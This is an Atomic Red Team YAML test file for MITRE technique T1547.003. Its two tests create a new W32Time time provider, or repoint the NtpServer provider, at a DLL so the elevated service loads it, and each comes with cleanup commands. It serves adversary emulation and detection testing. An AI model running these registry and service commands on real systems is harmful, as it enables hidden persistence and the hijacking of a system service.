Carrie Roberts
d4709021fb
* updating atomics count in README.md [ci skip] * wip * handle spaces in path * update readme * fix typo --------- Co-authored-by: publish bot <opensource@redcanary.com>
58 lines
3.3 KiB
YAML
58 lines
3.3 KiB
YAML
attack_technique: T1547.003
|
|
display_name: Time Providers
|
|
atomic_tests:
|
|
- name: Create a new time provider
|
|
auto_generated_guid: df1efab7-bc6d-4b88-8be9-91f55ae017aa
|
|
|
|
description: |
|
|
Establishes persistence by creating a new time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
|
|
The new time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
|
|
in C:\Users\Public\ as validation that the test is successful.
|
|
|
|
Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
net stop w32time
|
|
Copy-Item "$PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll" C:\Users\Public\AtomicTest.dll
|
|
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
|
|
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "Enabled" /d "1" /f
|
|
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "InputProvider" /d "1" /f
|
|
net start w32time
|
|
cleanup_command: |
|
|
net stop w32time
|
|
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /f
|
|
rm -force C:\Users\Public\AtomicTest.dll
|
|
net start w32time
|
|
name: powershell
|
|
elevation_required: true
|
|
|
|
- name: Edit an existing time provider
|
|
auto_generated_guid: 29e0afca-8d1d-471a-8d34-25512fc48315
|
|
|
|
description: |
|
|
Establishes persistence by editing the NtpServer time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
|
|
The time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
|
|
in C:\Users\Public\ as validation that the test is successful.
|
|
|
|
Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
net stop w32time
|
|
Copy-Item "$PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll" C:\Users\Public\AtomicTest.dll
|
|
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
|
|
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "1" /f
|
|
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "1" /f
|
|
net start w32time
|
|
cleanup_command: |
|
|
net stop w32time
|
|
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Windows\SYSTEM32\w32time.DLL" /f
|
|
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "0" /f
|
|
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "0" /f
|
|
rm -force C:\Users\Public\AtomicTest.dll
|
|
net start w32time
|
|
name: powershell
|
|
elevation_required: true |